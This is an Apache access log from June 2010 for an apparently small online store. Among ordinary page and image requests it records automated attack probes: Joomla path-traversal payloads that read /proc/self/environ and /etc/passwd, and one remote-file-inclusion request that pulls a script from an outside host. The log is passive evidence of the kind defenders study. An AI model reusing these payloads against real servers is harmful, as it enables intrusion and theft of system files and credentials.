119.193.103.190 - - [21/Jun/2010:02:03:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
188.72.70.56 - - [21/Jun/2010:02:03:38 -0400] "GET /logs/access_log.Q110061000//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:03:39 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:03:39 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
119.193.103.190 - - [21/Jun/2010:02:03:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
188.72.70.56 - - [21/Jun/2010:02:03:40 -0400] "GET /logs/error_log.Q110061400//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
119.193.103.190 - - [21/Jun/2010:02:03:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:47 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:49 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
188.72.70.56 - - [21/Jun/2010:02:03:55 -0400] "GET /logs/access_log.Q110061000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:03:55 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:03:56 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
216.17.105.143 - - [21/Jun/2010:02:03:59 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:02:03:59 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:02:04:00 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:02:04:09 -0400] "GET /logs/access_log.Q110052800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
188.72.70.56 - - [21/Jun/2010:02:04:12 -0400] "GET /logs/error_log.Q110060300//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:04:12 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:04:13 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
216.17.105.143 - - [21/Jun/2010:02:04:27 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
209.59.12.99 - - [21/Jun/2010:02:04:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.228.131.90 - - [21/Jun/2010:02:04:43 -0400] "GET /logs/access_log.Q110052900/?option=com_gcalendar&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
82.39.188.43 - - [21/Jun/2010:02:04:48 -0400] "GET /logs/access_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
91.121.20.205 - - [21/Jun/2010:02:05:33 -0400] "GET //index.php?option=com_bca-rss-syndicator&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
91.121.20.205 - - [21/Jun/2010:02:05:33 -0400] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
64.118.87.45 - - [21/Jun/2010:02:05:53 -0400] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
64.118.87.45 - - [21/Jun/2010:02:05:53 -0400] "GET //index.php?option=com_bca-rss-syndicator&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
67.15.152.183 - - [21/Jun/2010:02:05:58 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
62.44.82.118 - - [21/Jun/2010:02:06:13 -0400] "GET /logs/access_log.Q110061300//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
62.44.82.118 - - [21/Jun/2010:02:06:13 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.803"
62.44.82.118 - - [21/Jun/2010:02:06:13 -0400] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
178.63.49.142 - - [21/Jun/2010:02:06:50 -0400] "HEAD / HTTP/1.1" 200 - "http://www.aceonlinestore.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:50 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:50 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:50 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET / HTTP/1.1" 200 409 "https://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /scripts/ HTTP/1.1" 200 802 "http://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "http://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /Includes/ HTTP/1.1" 200 220 "http://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /index.htm HTTP/1.1" 200 870 "http://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /images/ HTTP/1.1" 200 49338 "http://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /logs/ HTTP/1.1" 200 55286 "http://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /Includes/ HTTP/1.1" 200 220 "https://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "https://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /index.htm HTTP/1.1" 200 870 "https://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:51 -0400] "GET /images/ HTTP/1.1" 200 49338 "https://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /index.htm HTTP/1.1" 200 870 "http://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "http://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /Includes/ HTTP/1.1" 200 220 "http://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /scripts/ HTTP/1.1" 200 802 "http://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /logs/ HTTP/1.1" 200 55286 "http://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /images/ HTTP/1.1" 200 49338 "http://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /Includes/ HTTP/1.1" 200 220 "https://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "https://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /index.htm HTTP/1.1" 200 870 "https://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:06:52 -0400] "GET /images/ HTTP/1.1" 200 49338 "https://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.44.82.118 - - [21/Jun/2010:02:06:59 -0400] "GET /logs/error_log.Q110061100//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
78.46.72.99 - - [21/Jun/2010:02:07:00 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4319)"
78.46.72.99 - - [21/Jun/2010:02:07:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
78.46.72.99 - - [21/Jun/2010:02:07:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
78.46.66.124 - - [21/Jun/2010:02:07:03 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4317)"
78.46.72.99 - - [21/Jun/2010:02:07:04 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
78.46.66.124 - - [21/Jun/2010:02:07:04 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.432)"
178.63.49.142 - - [21/Jun/2010:02:07:04 -0400] "GET /scripts/ HTTP/1.1" 200 802 "https://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:04 -0400] "GET /logs/ HTTP/1.1" 200 55286 "https://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
78.46.72.99 - - [21/Jun/2010:02:07:05 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
178.63.49.142 - - [21/Jun/2010:02:07:05 -0400] "GET /scripts/ HTTP/1.1" 200 802 "https://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:05 -0400] "GET /logs/ HTTP/1.1" 200 55286 "https://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
78.46.72.99 - - [21/Jun/2010:02:07:05 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.434)"
78.46.71.246 - - [21/Jun/2010:02:07:06 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.436)"
78.46.66.124 - - [21/Jun/2010:02:07:05 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):33578_________________________ HTTP/1.1" 200 77252 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.432)"
78.46.71.245 - - [21/Jun/2010:02:07:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "http://www.aceonlinestore.com/images/_notes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /images/tools/ HTTP/1.1" 200 3703 "http://www.aceonlinestore.com/images/tools/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "http://www.aceonlinestore.com/images/LCALEN.HTM" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /images/Office Supply/ HTTP/1.1" 404 211 "http://www.aceonlinestore.com/images/Office Supply/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY HTTP/1.1" 401 527 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC HTTP/1.1" 401 527 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC(A0300): HTTP/1.1" 401 527 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC(A0300):" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY HTTP/1.1" 401 527 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
78.46.71.246 - - [21/Jun/2010:02:07:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.430)"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /images/items/ HTTP/1.1" 200 80009 "http://www.aceonlinestore.com/images/items/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
78.46.71.245 - - [21/Jun/2010:02:07:07 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.438)"
78.46.72.56 - - [21/Jun/2010:02:07:07 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.435)"
78.46.71.246 - - [21/Jun/2010:02:07:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.435)"
78.46.72.56 - - [21/Jun/2010:02:07:07 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.433)"
203.211.129.97 - - [21/Jun/2010:02:07:08 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
178.63.49.142 - - [21/Jun/2010:02:07:06 -0400] "GET /logs/access_log.Q109050700 HTTP/1.1" 200 301885 "http://www.aceonlinestore.com/logs/access_log.Q109050700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
203.211.129.97 - - [21/Jun/2010:02:07:08 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
78.46.76.90 - - [21/Jun/2010:02:07:09 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4311)"
203.211.129.97 - - [21/Jun/2010:02:07:09 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
178.63.49.142 - - [21/Jun/2010:02:07:09 -0400] "GET /images/tools/ HTTP/1.1" 200 3703 "http://www.aceonlinestore.com/images/tools/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:09 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "http://www.aceonlinestore.com/images/LCALEN.HTM" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:09 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "http://www.aceonlinestore.com/images/_notes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:09 -0400] "GET /images/items/ HTTP/1.1" 200 80009 "http://www.aceonlinestore.com/images/items/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
78.46.76.90 - - [21/Jun/2010:02:07:09 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4316)"
78.46.71.246 - - [21/Jun/2010:02:07:09 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.434)"
78.46.71.217 - - [21/Jun/2010:02:07:11 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.433)"
178.63.49.142 - - [21/Jun/2010:02:07:09 -0400] "GET /logs/access_log.Q109050700 HTTP/1.1" 200 301885 "http://www.aceonlinestore.com/logs/access_log.Q109050700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
78.46.71.217 - - [21/Jun/2010:02:07:12 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4316)"
178.63.50.146 - - [21/Jun/2010:02:07:19 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.430)"
